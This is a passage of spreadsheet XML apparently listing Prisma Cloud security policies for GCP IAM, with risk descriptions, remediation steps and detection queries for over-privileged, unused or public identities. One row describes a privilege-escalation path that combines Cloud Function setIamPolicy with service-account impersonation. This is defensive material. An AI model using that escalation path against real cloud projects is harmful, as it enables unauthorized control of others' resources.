      <c r="AG32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8" t="inlineStr">
        <is>
          <t>f03a1ce8-67d6-4e43-a613-393756aa11dc</t>
        </is>
      </c>
      <c r="AI3248" t="inlineStr">
        <is>
          <t>f03a1ce8-67d6-4e43-a613-393756aa11dc</t>
        </is>
      </c>
      <c r="AJ3248" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3248" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3249">
      <c r="A3249" t="inlineStr"/>
      <c r="B3249" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3249" s="2" t="inlineStr"/>
      <c r="D3249" t="n">
        <v>0</v>
      </c>
      <c r="E3249" t="n">
        <v>0</v>
      </c>
      <c r="F3249" t="n">
        <v>13</v>
      </c>
      <c r="G3249" t="b">
        <v>1</v>
      </c>
      <c r="H32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49" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3249" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3249" t="inlineStr">
        <is>
          <t>GCP Groups and Service Accounts with Administrative Permissions</t>
        </is>
      </c>
      <c r="L3249" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3249" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3249" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3249" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3249" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3249" t="inlineStr"/>
      <c r="R3249" t="inlineStr"/>
      <c r="S3249" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3249" t="b">
        <v>0</v>
      </c>
      <c r="U3249" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3249" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3249" t="inlineStr">
        <is>
          <t>This policy identifies GCP Groups and Service Accounts with IAM Administrative Permissions.
Risk of Administrative Permissions:
GCP Groups and Service Accounts with active IAM administrative permissions (elevated permissions) pose a significant security risk because:
Broad Access Potential: Unlike individual users with specific credentials, groups can grant administrative access to a wider pool of users, increasing the attack surface. If compromised, attackers can exploit a group to gain control over a larger number of accounts and resources within your GCP project.
Misuse by Assigned Users: Even with proper vetting, there's always a risk that users assigned to an administrative group might misuse their access unintentionally or through social engineering attacks.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Avoid creating groups with administrative permissions unless absolutely necessary. Grant only the minimum set of permissions required for group members to fulfill their specific tasks.
Minimize Group Membership: Limit the number of users assigned to groups with administrative permissions. This reduces the potential impact of a compromise and simplifies access management.
Use Service Accounts for Automation: For automated tasks requiring administrative access, consider using service accounts with appropriate permissions instead of granting administrative access to groups. Service accounts offer better control and auditability.
GCP IAM Recommender: Utilize GCP IAM Recommender to identify and flag underused or overly permissive IAM policies associated with groups and service accounts. This proactive approach helps ensure appropriate access control.
Monitor for Suspicious Activity: Utilize Stackdriver Logging to track activity logs, including actions performed by users belonging to administrative groups and service accounts with administrative permissions. This vigilance can help detect unusual activity related to these entities that might indicate a compromise.
Regular Review and Auditing: Regularly review GCP group memberships and service account permissions, especially those with administrative privileges. Conduct periodic security audits to identify potential weaknesses in your IAM configuration.</t>
        </is>
      </c>
      <c r="X3249" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service
 3. Find the binding between the service account/group and the resources that shouldn't have broad access
 4. Remove the binding</t>
        </is>
      </c>
      <c r="Y3249" t="inlineStr"/>
      <c r="Z3249" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and grantedby.cloud.entity.type NOT IN ('user') and action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3249" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3249" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3249" t="inlineStr"/>
      <c r="AD3249" t="b">
        <v>1</v>
      </c>
      <c r="AE3249" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3249" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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49" t="inlineStr">
        <is>
          <t>74f8409f-f008-4a83-bd7f-05151e3d1463</t>
        </is>
      </c>
      <c r="AI3249" t="inlineStr">
        <is>
          <t>74f8409f-f008-4a83-bd7f-05151e3d1463</t>
        </is>
      </c>
      <c r="AJ3249" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3249" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3250">
      <c r="A3250" t="inlineStr"/>
      <c r="B3250" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3250" s="2" t="inlineStr"/>
      <c r="D3250" t="inlineStr"/>
      <c r="E3250" t="inlineStr"/>
      <c r="F3250" t="inlineStr"/>
      <c r="G3250" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3250" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3250" t="inlineStr">
        <is>
          <t>GCP Groups and Service Accounts with IAM Metadata Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3250" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3250" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3250" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3250" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3250" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3250" t="inlineStr"/>
      <c r="R3250" t="inlineStr"/>
      <c r="S3250" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3250" t="b">
        <v>0</v>
      </c>
      <c r="U3250" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3250" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3250" t="inlineStr">
        <is>
          <t>This policy identifies GCP Groups and Service Accounts with Stale IAM Effective Metadata Read Permissions.
Risk of Unused Metadata Read Permissions:
Even seemingly low-risk permissions like "Metadata Read" in GCP IAM can be problematic if left unused for extended periods. Unused GCP groups and service accounts with IAM effective Metadata Read permissions for 90 days present a security concern because:
Information Gathering Tool: An attacker with access to these credentials could use them to gather sensitive details about your GCP environment. This information could include project structures, VM types and locations, or network configurations. Attackers could exploit this knowledge to identify vulnerabilities or plan more targeted attacks against your VMs or other resources.
Potential Lateral Movement Path: A compromised unused group or service account with Metadata Read permissions could be a stepping stone for attackers. They might leverage this access to discover and exploit further vulnerabilities within your GCP project, potentially leading to unauthorized access to more sensitive data or systems.
Mitigating the Risk:
Regular Review and Removal: Regularly identify and remove unused GCP groups and service accounts with any level of IAM effective Metadata access (Read or Write) on a scheduled basis.
Principle of Least Privilege: Adhere to the principle of least privilege when assigning IAM permissions. Grant only the minimum level of Metadata Read access required for a group or service account to function effectively. Evaluate if alternative methods, like IAM conditions or service account key restrictions, can restrict access to specific VMs or projects.
Monitor for Suspicious Activity: Utilize Stackdriver Logging to track activity logs, including access attempts for GCP groups and service accounts. This vigilance can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3250" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service
 3. Find the binding between the service account/group and the resources that shouldn't have broad access
 4. Remove the binding</t>
        </is>
      </c>
      <c r="Y3250" t="inlineStr"/>
      <c r="Z3250" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Metadata Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3250" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3250" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3250" t="inlineStr"/>
      <c r="AD3250" t="b">
        <v>1</v>
      </c>
      <c r="AE3250" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3250" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>c3748cc4-3a7b-4e92-93e1-752b878c4161</t>
        </is>
      </c>
      <c r="AI3250" t="inlineStr">
        <is>
          <t>c3748cc4-3a7b-4e92-93e1-752b878c4161</t>
        </is>
      </c>
      <c r="AJ3250" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3250" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3251">
      <c r="A3251" t="inlineStr"/>
      <c r="B3251" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3251" s="2" t="inlineStr"/>
      <c r="D3251" t="inlineStr"/>
      <c r="E3251" t="inlineStr"/>
      <c r="F3251" t="inlineStr"/>
      <c r="G3251" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3251" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3251" t="inlineStr">
        <is>
          <t>GCP Users and Machine Identities with IAM Data Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3251" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3251" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3251" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3251" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3251" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3251" t="inlineStr"/>
      <c r="R3251" t="inlineStr"/>
      <c r="S3251" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3251" t="b">
        <v>1</v>
      </c>
      <c r="U3251" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3251" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3251" t="inlineStr">
        <is>
          <t>This policy identifies GCP identities with Unused Data Write Permissions.
Even seemingly innocuous permissions like "Data Read" in GCP IAM can be risky if left unused for extended periods. Unused GCP users and machine identities with Data Read permissions for 90 days present a security concern because:
Information Gathering Tool: An attacker wielding such credentials could use them to gather sensitive details about your GCP environment. This information could include project structures, storage buckets, or virtual machine configurations. Attackers could exploit this knowledge to identify vulnerabilities or plan more targeted attacks.
Potential Stepping Stone: A compromised unused user with Data Read permissions could be a stepping stone for attackers. They might leverage this access to discover and exploit further vulnerabilities within your GCP project, potentially leading to unauthorized access to more sensitive data or systems.
Mitigating the Risk:
Regular Review and Removal: Regularly identify and remove unused GCP user accounts and machine identities with any level of IAM Data Read permissions (Read or Write) on a scheduled basis.
Principle of Least Privilege: Always adhere to the principle of least privilege. Grant only the minimum level of Data Read access required for a user or machine identity to function ly. Evaluate if alternative methods, like IAM conditions, can restrict access to specific resources or data sets.
Monitor for Suspicious Activity: Utilize Stackdriver Logging to track activity logs, including access attempts for GCP user accounts and service accounts. This can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3251"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5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51" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and action.access.level = 'Data Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3251" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3251" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3251" t="inlineStr"/>
      <c r="AD3251" t="b">
        <v>1</v>
      </c>
      <c r="AE3251" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3251" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>182ba9c7-26f9-4e48-a8e4-31215ba7befa</t>
        </is>
      </c>
      <c r="AI3251" t="inlineStr">
        <is>
          <t>182ba9c7-26f9-4e48-a8e4-31215ba7befa</t>
        </is>
      </c>
      <c r="AJ3251" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3251" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3252">
      <c r="A3252" t="inlineStr"/>
      <c r="B3252" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3252" s="2" t="inlineStr"/>
      <c r="D3252" t="inlineStr"/>
      <c r="E3252" t="inlineStr"/>
      <c r="F3252" t="inlineStr"/>
      <c r="G3252" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3252" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3252" t="inlineStr">
        <is>
          <t>GCP resources that are publicly accessible through IAM policies</t>
        </is>
      </c>
      <c r="L3252" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3252" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3252" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3252" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3252" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3252" t="inlineStr"/>
      <c r="R3252" t="inlineStr"/>
      <c r="S3252" t="inlineStr"/>
      <c r="T3252" t="b">
        <v>0</v>
      </c>
      <c r="U3252" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3252" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3252" t="inlineStr">
        <is>
          <t>This policy identifies the GCP resources which are publicly accessible through IAM policies. Ensure that the CGP resources provisioned in your GCP account are not publicly accessible from the Internet to avoid sensitive data exposure and minimize security risks.</t>
        </is>
      </c>
      <c r="X3252" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the relevant service 
3. Find role binding with AllUsers or AllAuthenticatedUsers
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3252" t="inlineStr"/>
      <c r="Z3252" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.public = true</t>
        </is>
      </c>
      <c r="AA3252" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3252" t="inlineStr">
        <is>
          <t>2022-08-22 05:13:36</t>
        </is>
      </c>
      <c r="AC3252" t="inlineStr"/>
      <c r="AD3252" t="b">
        <v>1</v>
      </c>
      <c r="AE3252" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3252" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>70f53d78-89ab-4fb2-b50a-b0c07dad3dc6</t>
        </is>
      </c>
      <c r="AI3252" t="inlineStr">
        <is>
          <t>70f53d78-89ab-4fb2-b50a-b0c07dad3dc6</t>
        </is>
      </c>
      <c r="AJ3252" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3252" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3253">
      <c r="A3253" t="inlineStr"/>
      <c r="B3253" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3253" s="2" t="inlineStr"/>
      <c r="D3253" t="inlineStr"/>
      <c r="E3253" t="inlineStr"/>
      <c r="F3253" t="inlineStr"/>
      <c r="G3253" t="b">
        <v>1</v>
      </c>
      <c r="H32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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3253" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3253" t="inlineStr">
        <is>
          <t>GCP service accounts with 'Editor' role on folder level</t>
        </is>
      </c>
      <c r="L3253" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3253" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3253" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3253" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3253" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3253" t="inlineStr"/>
      <c r="R3253" t="inlineStr"/>
      <c r="S3253" t="inlineStr"/>
      <c r="T3253" t="b">
        <v>0</v>
      </c>
      <c r="U3253" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3253" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3253" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Editor' on folder level that is defined as risky role. Ensure that the service accounts in your GCP environment don't have a risky 'Editor' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3253" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant folder
 3. Navigate to the IAM service
 4. Find the binding between the service account  and the "Editor" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3253" t="inlineStr"/>
      <c r="Z3253" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and grantedby.cloud.entity.type = 'serviceAccount' and grantedby.cloud.policy.name = 'Editor' and grantedby.level.type = 'GCP Folder'</t>
        </is>
      </c>
      <c r="AA3253" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3253" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3253" t="inlineStr"/>
      <c r="AD3253" t="b">
        <v>1</v>
      </c>
      <c r="AE3253" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3253" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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3" t="inlineStr">
        <is>
          <t>80642bcc-2903-4599-9a3f-c23905254ff9</t>
        </is>
      </c>
      <c r="AI3253" t="inlineStr">
        <is>
          <t>80642bcc-2903-4599-9a3f-c23905254ff9</t>
        </is>
      </c>
      <c r="AJ3253" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3253" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3254">
      <c r="A3254" t="inlineStr"/>
      <c r="B3254" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3254" s="2" t="inlineStr"/>
      <c r="D3254" t="inlineStr"/>
      <c r="E3254" t="inlineStr"/>
      <c r="F3254" t="inlineStr"/>
      <c r="G3254" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3254" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3254" t="inlineStr">
        <is>
          <t>GCP users with 'Editor' role on folder level</t>
        </is>
      </c>
      <c r="L3254" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3254" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3254" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3254" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3254" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3254" t="inlineStr"/>
      <c r="R3254" t="inlineStr"/>
      <c r="S3254" t="inlineStr"/>
      <c r="T3254" t="b">
        <v>0</v>
      </c>
      <c r="U3254" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3254" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3254" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Editor' on folder level that is defined as risky role. Ensure that the users in your GCP environment don't have a risky 'Editor' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3254" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant folder
 3. Navigate to the IAM service
 4. Find the binding between the user  and the "Editor" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3254" t="inlineStr"/>
      <c r="Z3254" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and grantedby.cloud.policy.name = 'Editor' and grantedby.level.type = 'GCP Folder'</t>
        </is>
      </c>
      <c r="AA3254" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3254" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3254" t="inlineStr"/>
      <c r="AD3254" t="b">
        <v>1</v>
      </c>
      <c r="AE3254" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3254" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>542e4d23-c2f9-4f49-b595-2c2b2ebd1d21</t>
        </is>
      </c>
      <c r="AI3254" t="inlineStr">
        <is>
          <t>542e4d23-c2f9-4f49-b595-2c2b2ebd1d21</t>
        </is>
      </c>
      <c r="AJ3254" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3254" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3255">
      <c r="A3255" t="inlineStr"/>
      <c r="B3255" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3255" s="2" t="inlineStr"/>
      <c r="D3255" t="inlineStr"/>
      <c r="E3255" t="inlineStr"/>
      <c r="F3255" t="inlineStr"/>
      <c r="G3255" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3255" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3255" t="inlineStr">
        <is>
          <t>GCP users with 'Owner' role on folder level</t>
        </is>
      </c>
      <c r="L3255" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3255" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3255" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3255" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3255" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3255" t="inlineStr"/>
      <c r="R3255" t="inlineStr"/>
      <c r="S3255" t="inlineStr"/>
      <c r="T3255" t="b">
        <v>0</v>
      </c>
      <c r="U3255" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3255" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3255" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Owner' on folder level that is defined as risky role. Ensure that the users in your GCP environment don't have a risky 'Owner' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3255" t="inlineStr"/>
      <c r="Y3255" t="inlineStr"/>
      <c r="Z3255" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and grantedby.cloud.policy.name = 'Owner' and grantedby.level.type = 'GCP Folder'</t>
        </is>
      </c>
      <c r="AA3255" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3255" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3255" t="inlineStr"/>
      <c r="AD3255" t="b">
        <v>1</v>
      </c>
      <c r="AE3255" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3255" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>b7b80b79-451d-4635-bbe8-236e2808ecef</t>
        </is>
      </c>
      <c r="AI3255" t="inlineStr">
        <is>
          <t>b7b80b79-451d-4635-bbe8-236e2808ecef</t>
        </is>
      </c>
      <c r="AJ3255" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3255" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3256">
      <c r="A3256" t="inlineStr"/>
      <c r="B3256" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3256" s="2" t="inlineStr"/>
      <c r="D3256" t="inlineStr"/>
      <c r="E3256" t="inlineStr"/>
      <c r="F3256" t="inlineStr"/>
      <c r="G3256" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3256" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3256" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Cloud Function IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3256" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3256" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3256" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3256" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3256" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3256" t="inlineStr"/>
      <c r="R3256" t="inlineStr"/>
      <c r="S3256" t="inlineStr"/>
      <c r="T3256" t="b">
        <v>1</v>
      </c>
      <c r="U3256" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3256" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3256" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. By editing the IAM policy for Cloud Function instances, in conjunction with Service Account impersonation privileges they would be able to escalate their permissions by adding edit permissions to an instance, causing it to perform attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3256" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y325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56" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name CONTAINS ALL ( 'cloudfunctions.functions.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3256" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3256" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3256" t="inlineStr"/>
      <c r="AD3256" t="b">
        <v>1</v>
      </c>
      <c r="AE3256" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3256" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>1579bf5e-2670-4d24-be3f-567f7195eb67</t>
        </is>
      </c>
      <c r="AI3256" t="inlineStr">
        <is>
          <t>1579bf5e-2670-4d24-be3f-567f7195eb67</t>
        </is>
      </c>
      <c r="AJ3256" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3256" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3257">
      <c r="A3257" t="inlineStr"/>
      <c r="B3257" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3257" s="2" t="inlineStr"/>
      <c r="D3257" t="n">
        <v>0</v>
      </c>
      <c r="E3257" t="n">
        <v>179</v>
      </c>
      <c r="F3257" t="n">
        <v>626</v>
      </c>
      <c r="G3257" t="b">
        <v>1</v>
      </c>
